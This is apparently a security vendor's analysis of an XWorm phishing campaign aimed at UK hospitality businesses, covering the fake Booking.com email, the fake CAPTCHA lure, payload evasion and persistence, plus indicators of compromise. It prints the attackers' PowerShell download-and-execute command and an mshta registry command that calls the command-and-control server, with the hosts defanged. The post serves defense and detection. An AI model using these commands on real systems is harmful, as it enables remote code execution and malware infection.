XWorm Malware Targets United Kingdom’s Hospitality Sector

X-Labs recently identified an email phishing campaign distributing XWorm malware that targets the hospitality sector in the United Kingdom.

Fig. 1 - XWorm attack chain

The initial infection vector is a phishing email with a spoofed sender, made to appear as though it was sent from Booking.com. The email contains a link to a malicious website.

Fig. 2 - XWorm phishing email

Clicking the link directs the user to hxxps://extraguestreview[.]com#3Vrn_OYy in their browser. From our analysis. this campaign appears to only target Windows systems.

Fig. 3 - Windows user message

For Windows users, the website displays a fake CAPTCHA message over a subtly visible background designed to mimic a legitimate Booking.com page.

Fig. 4 - Fake Windows CAPTCHA

Following the on-screen instructions to complete the CAPTCHA leads the user to open a Windows Run command window using keyboard shortcuts. It then instructs the user to copy and execute a command, triggering the next stage of the attack (see Fig. 6 below):

Fig. 5 - Windows run command window

Fig. 6 - Command executes next stage of the attack

• IEX (New-Object Net.WebClient).DownloadString('hxxp://92.255.57[.]155/1/1.png')                                       

The IP address hosts an obfuscated, partially base64-encoded script. To conceal its activities, the malware uses the 'ipconfig' command to clear the DNS cache, potentially disrupting network connectivity and helping mask its malicious behaviour. The PowerShell script embeds two PE files, which serve as the XWorm payloads.

To evade detection, the MZ 'magic number' is stripped from the base64-encoded PE file’s hexadecimal entries, but is reintroduced during execution, allowing the payloads to be decoded and run directly in memory. To maintain persistence, the malware creates an autorun registry key that ensures it connects to its command-and-control (C2) server upon system reboot.

Fig. 7 - Script clears DNS cache

Embedded Payloads:

Runa.dll is a 32-bit .NET compiled executable, protected by Crypto Obfuscator, with a compile date of December 8, 2024. Analysis of the binary's strings provides insight into some of its functionality.

Fig. 8 - Runa.dll contents

Fig. 9 - Runa.dllbinary string analysis

SharpHide.exe is a 32-bit .NET compiled executable, protected by Confuser, with a compile date of October 20, 2024. Its main method includes functionality for persistence, adding a registry key to ensure it runs on each system restart.

Fig. 10 - SharpHide.exe executable

Fig. 11 - SharpHide.exe content analysis

The registry key is created with the name "(default)" and the value:

• mshta vbscript:close(CreateObject(\"WScript.Shell\").Run(\"mshta hxxp://92.255.57[.]155/1\",0))

Fig. 12 - Registry key

Conclusion:

This new malware delivery technique has gained significant traction in recent months. Attackers are exploiting users' tendency to hastily click through verification prompts while browsing the web. By capitalizing on this impulse, the attacks are proving highly effective. In this method, the user inadvertently initiates the attack, which is largely undetectable due to the use of "living off the land" techniques and running malicious code runs directly in memory without leaving traces on the system.

Protection Statement:

• Stage 2 (Lure) – Delivered via malicious URL embedded in an email. Emails are blocked by Email Analytics
• Stage 3 (Malicious Website) – URLs hosting the PowerShell Scripts are blocked by Web Analytics and Real Time Security Analytics
• Stage 6 (Call Home) - The malware’s Command and Control server (C2) is blocked under Security Classification

IOCs:

• Lure website - hxxps://extraguestreview[.]com#3Vrn_OYy
• XWorm C2 - 92.255.57[.]155
• hxxp://92.255.57[.]155/Capcha.html
• hxxp://92.255.57[.]155/1/1.png
• hxxp://92.255.57[.]155/1/2.png
• Runa.dll, SHA256 6c327eec94240fa4d1b7141396a7a1e01d76120ab7fca9ae38e5202ce2e916f9
• SharpHide.exe, SHA256 ffac95298176d8441ae088c6d5e95b0892afa9768876d3c749404eb31d4b4b6a